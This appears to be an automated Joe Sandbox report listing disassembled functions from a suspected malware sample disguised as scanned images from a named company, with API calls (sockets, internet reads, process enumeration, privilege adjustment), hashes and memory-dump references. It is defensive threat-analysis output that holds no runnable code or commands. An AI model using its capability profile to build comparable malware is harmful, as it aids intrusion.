                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ColorProc$LongWindow
                                                        • String ID:
                                                        • API String ID: 3744519093-0
                                                        • Opcode ID: c2d5d34d3d457e427e3c0d0e693c2fa1127a077f003eb55ec6085099ecc7ba81
                                                        • Instruction ID: f7e0e0888a6e070e802a27965b89d7e0023260821a89bc2ff5b9a6475704c96e
                                                        • Opcode Fuzzy Hash: c2d5d34d3d457e427e3c0d0e693c2fa1127a077f003eb55ec6085099ecc7ba81
                                                        • Instruction Fuzzy Hash: 36A179701114A4BEE638AB2CBD85EBF35ADEB663D3B140139F802D65D1CB268D0192B5
                                                        Function 00A96A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A980A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A980CB
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A96AB1
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96ADA
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00A96B13
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96B20
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00A96B34
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 99427753-0
                                                        • Opcode ID: c97d97edc57e07c06ac2d55bad6eae8f5baa70ecad1b4854ac92c7db823cf428
                                                        • Instruction ID: fd4b3a44d05f8764e7123f61fbac8a6788e2ad75f1b93df598a2971dc15e8ec8
                                                        • Opcode Fuzzy Hash: c97d97edc57e07c06ac2d55bad6eae8f5baa70ecad1b4854ac92c7db823cf428
                                                        • Instruction Fuzzy Hash: 3B41C875B002209FEB14AF68ED86F6E77E5DF09B10F048068F95AAB3D2DB749D018791
                                                        Function 00AA55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: d3cb43d794b73d2fa24ab43fe9cf35c5a557d77ce836c82ba4ad5badd5b08038
                                                        • Instruction ID: 3b71df859a971b077beab397f6928b882ba46d4852fc2c456f1f4345f222a194
                                                        • Opcode Fuzzy Hash: d3cb43d794b73d2fa24ab43fe9cf35c5a557d77ce836c82ba4ad5badd5b08038
                                                        • Instruction Fuzzy Hash: D711C431B00A216FE7255FBADC44B6FB799EF46761B484039F846D72C1CB3099028AA8
                                                        Function 00A9C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00A61D88,?), ref: 00A9C312
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A9C324
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                        • API String ID: 2574300362-1816364905
                                                        • Opcode ID: 6f92dc26f279643286cb4bb84cfd33e5cec7bdec59c2ebde121c39258961e0ca
                                                        • Instruction ID: f5b056c38b7e9cc207d0079c5df7af0722b8668f00cc29b55c35196662baca98
                                                        • Opcode Fuzzy Hash: 6f92dc26f279643286cb4bb84cfd33e5cec7bdec59c2ebde121c39258961e0ca
                                                        • Instruction Fuzzy Hash: 26E0EC74710B13DFDF249BA5D844A87B6E4FB09765B80883AE9A6D62A0E770D841CA60
                                                        Function 00A33190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __itow__swprintf
                                                        • String ID:
                                                        • API String ID: 674341424-0
                                                        • Opcode ID: eb0e3cf855f6bbfc427f84e5892f19edbfe9c60266bd3136554a439722a49cfc
                                                        • Instruction ID: d089c2ce67464222e7daa2e13086c50bcab2f162a02ba14db4f6d3bf15d50915
                                                        • Opcode Fuzzy Hash: eb0e3cf855f6bbfc427f84e5892f19edbfe9c60266bd3136554a439722a49cfc
                                                        • Instruction Fuzzy Hash: F8229D725083119FCB24DF28C991B6FB7F4AF84714F10892DF5969B291DB70EA44CB92
                                                        Function 00A9F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00A9F151
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00A9F15F
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00A9F21F
                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00A9F22E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                        • String ID:
                                                        • API String ID: 2576544623-0
                                                        • Opcode ID: d403b7d67739f46f9903520bcad78622be2fd4a3288d23ef71b1a0c7a0802199
                                                        • Instruction ID: 52b779bde11edebf150ca2d0f30b50c94b45333a002e30b1ba60353fc335bf96
                                                        • Opcode Fuzzy Hash: d403b7d67739f46f9903520bcad78622be2fd4a3288d23ef71b1a0c7a0802199
                                                        • Instruction Fuzzy Hash: 12518D715043119FD710EF24ED86E6BB7E8FF88750F10492DF596972A1EB70AA04CB92
                                                        Function 00A840B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00A840D1
                                                        • _memset.LIBCMT ref: 00A840F2
                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00A84144
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A8414D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                        • String ID:
                                                        • API String ID: 1157408455-0
                                                        • Opcode ID: e7f363ff443c274d2bcf4d180201dea791915b9cf38ee0ef833672a8fe0e1579
                                                        • Instruction ID: e26865d06966a62cff55009b1373a6c8b63b6f777e7550cd23818422dd0fe376
                                                        • Opcode Fuzzy Hash: e7f363ff443c274d2bcf4d180201dea791915b9cf38ee0ef833672a8fe0e1579
                                                        • Instruction Fuzzy Hash: BE11AB759012287AD7309BE5AC4DFABBB7CEF45760F10429AF908D7180D6744E848BA4
                                                        Function 00A7EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A7EB19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        • Opcode ID: d3a98cd72e35649cd311410ff2085247d0bd16158f79e1a6821d884b49315f4f
                                                        • Instruction ID: e347f8438dde60eb0709db944f82335ecf9199656037254b944482d6d537442f
                                                        • Opcode Fuzzy Hash: d3a98cd72e35649cd311410ff2085247d0bd16158f79e1a6821d884b49315f4f
                                                        • Instruction Fuzzy Hash: 1B322775A007059FD728CF29C881A6AB7F1FF48310B15C5AEE89ADB7A1E770E941CB44
                                                        Function 00A925E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00A926D5
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A9270C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: 40c675f1014e3d764fa0b53b80affdb1b98e696db6e52314a944cb0f8d38b726
                                                        • Instruction ID: c382a37ef8ef98df14fcdc0683d01fc7982f50bc0250b9305fb30b74f31403db
                                                        • Opcode Fuzzy Hash: 40c675f1014e3d764fa0b53b80affdb1b98e696db6e52314a944cb0f8d38b726
                                                        • Instruction Fuzzy Hash: 3F41C075B00209BFEF20DB94DD85FBBB7FCEB40724F10406AF601A6540EA71AE419B60
                                                        Function 00A8B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A8B5AE
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A8B608
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00A8B655
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: 911486e7a5601e8de5555c44a20944f996fe55aa5f03711e33ec2c3234d4d42f
                                                        • Instruction ID: 43ddd08db77b9266b972d132c95a23ad5bd64534dd9e2233f3d0fbb50d4be893
                                                        • Opcode Fuzzy Hash: 911486e7a5601e8de5555c44a20944f996fe55aa5f03711e33ec2c3234d4d42f
                                                        • Instruction Fuzzy Hash: BE21A435A00118EFCB00EFA5D985EEEBBB8FF49310F0480A9E905AB351DB319906CB50
                                                        Function 00A78CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A40FF6: std::exception::exception.LIBCMT ref: 00A4102C
                                                          • Part of subcall function 00A40FF6: __CxxThrowException@8.LIBCMT ref: 00A41041
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A78D0D
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A78D3A
                                                        • GetLastError.KERNEL32 ref: 00A78D47
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: 73c540859718769cebba4c9eca099e8269629ea6d2a35fe4eb6c630455e93376
                                                        • Instruction ID: 78a2fd4092cd36c230fb231ad9ab07827a40fa9469dac8a566d3ec1842fe0db3
                                                        • Opcode Fuzzy Hash: 73c540859718769cebba4c9eca099e8269629ea6d2a35fe4eb6c630455e93376
                                                        • Instruction Fuzzy Hash: 641191B1414209AFD728DFA4DD89D6BB7BCFB44711B20C52EF85A97241EB30AC418A60
                                                        Function 00A84C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A84C2C
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A84C43
                                                        • FreeSid.ADVAPI32(?), ref: 00A84C53
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 8a99d7670cc3138fe9d31a972bf6c225971181cde45c2d912916994be10e17ba
                                                        • Instruction ID: 49735d4661a219f88158d237f0aa6a0e8073fb465c2ba03b749f37cbe448f613
                                                        • Opcode Fuzzy Hash: 8a99d7670cc3138fe9d31a972bf6c225971181cde45c2d912916994be10e17ba
                                                        • Instruction Fuzzy Hash: 97F04975A1130DBFDF04DFF0DC89AAEBBBCEF08201F0044A9A901E2181E7706A048B50
                                                        Function 00A2E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7121862ba5c95dc8e3665a109eaa737844bb652c51bf8c14e3f656b403d41664
                                                        • Instruction ID: 576681ab32593e2df006561ffb25f339c64381e77d35c0bc3e0ea95ba1e29f8a
                                                        • Opcode Fuzzy Hash: 7121862ba5c95dc8e3665a109eaa737844bb652c51bf8c14e3f656b403d41664
                                                        • Instruction Fuzzy Hash: 0F22AC75A00226CFDB24DF68E580AAEB7F0FF58300F148579E856AB341E735AD85CB91
                                                        Function 00A8C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A8C966
                                                        • FindClose.KERNEL32(00000000), ref: 00A8C996
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 52246b81ed5907326b9c5bc566e7f1967dd423c142ab5d8de47c49da7c94cdf1
                                                        • Instruction ID: dd2f8c1e42ce22347057eaea0a7bae7d4ac9b3ee04d3b64189afd27f6290cae2
                                                        • Opcode Fuzzy Hash: 52246b81ed5907326b9c5bc566e7f1967dd423c142ab5d8de47c49da7c94cdf1
                                                        • Instruction Fuzzy Hash: BE11A5316006109FD710EF69D845A2BF7E5FF45320F00895EF8A9D7291DB30AC05CB91
                                                        Function 00A8A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00A9977D,?,00AAFB84,?), ref: 00A8A302
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00A9977D,?,00AAFB84,?), ref: 00A8A314
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: d17210ed6c6060dc066614ba9f37acef0391ceded6eb719a170af7a95ae7e3a1
                                                        • Instruction ID: ad461d0624ab78a34e4b35214d180fcca4cc6231fdb0ef71dfa6441bce55db02
                                                        • Opcode Fuzzy Hash: d17210ed6c6060dc066614ba9f37acef0391ceded6eb719a170af7a95ae7e3a1
                                                        • Instruction Fuzzy Hash: 67F0823564422DBBEB10AFE4CC48FEA776DFF09762F008166B918D6181D7309944CBE1
                                                        Function 00A78713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A78851), ref: 00A78728
                                                        • CloseHandle.KERNEL32(?,?,00A78851), ref: 00A7873A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 6c2f0013a45377340783ad35e6fe6ff1a62e4d2528ec4ff29e366eed1f7e325b
                                                        • Instruction ID: 16a86c4a3960377b271d054742d95c6290f0e381009eee3cd5f778f4ee2b6d3c
                                                        • Opcode Fuzzy Hash: 6c2f0013a45377340783ad35e6fe6ff1a62e4d2528ec4ff29e366eed1f7e325b
                                                        • Instruction Fuzzy Hash: 55E0B676010651EEEB292BA0ED09D777BA9EB45350724893DB89684470DB62ACD1DB10
                                                        Function 00A4A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A48F97,?,?,?,00000001), ref: 00A4A39A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A4A3A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
